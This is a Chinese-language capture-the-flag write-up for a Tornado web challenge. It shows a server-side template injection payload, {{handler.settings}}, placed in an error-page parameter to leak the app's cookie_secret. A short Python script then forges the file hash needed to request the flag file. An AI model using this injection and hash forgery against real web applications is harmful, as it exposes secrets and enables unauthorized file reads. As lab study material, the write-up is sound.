题目
看到flag.txt点击进去
题中提示render
可以观察url
61.147.171.105:51567/file?filename=/hints.txt&filehash=61c9f13a8bae46973d56ca4a693847d5
由文件名和文件的hash值可查询对应文件内容,现在就差个cookie_secret不知道
那么如何获得cookie_secret呢?
查到cookie_secret在application对象settings属性中,
self.application.settings可以用handler替代
handler指向处理当前这个页面的RequestHandler对象, RequestHandler.setting指向self.application.settings,因此构造payload
{{handler.settings}}
Tornado全称Tornado Web Server,是一个用Python语言写成的Web服务器兼Web应用框架
tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式
tornado render模板注入
SSTI模板注入学习 - fdx_xdf - 博客园 (cnblogs.com)
查询到可以使用{{handler.settings}}获取服务器的配置文件信息
playload
/file?filename={{handler.settings }}
报错了
61.147.171.105:51567/error?msg=Error
观察到Error与下方Error报错信息相同
将读取配置文件的代码放到msg后面。
构造payload:
error?msg={{handler.settings}}
成功拿到
'cookie_secret': 'a4860747-2d1b-4084-815e-56d946ad036f'}
import hashlib
def md5(message):
md5 = hashlib.md5()
md5.update(message.encode('utf-8'))
return md5.hexdigest()def main(salt, name):
print(md5(salt + md5(name)))
if __name__ == "__main__":
cookie_secret='a4860747-2d1b-4084-815e-56d946ad036f'
filename = "/fllllllllllllag"
main(cookie_secret, filename)
73e4ae0d5195c1529b924a29c28823c7
拿到了最后的md5值 ,但是搞了半天flag不出来。
61.147.171.105:51567/file?filename=/fllllllllllllag&filehash=73e4ae0d5195c1529b924a29c28823c7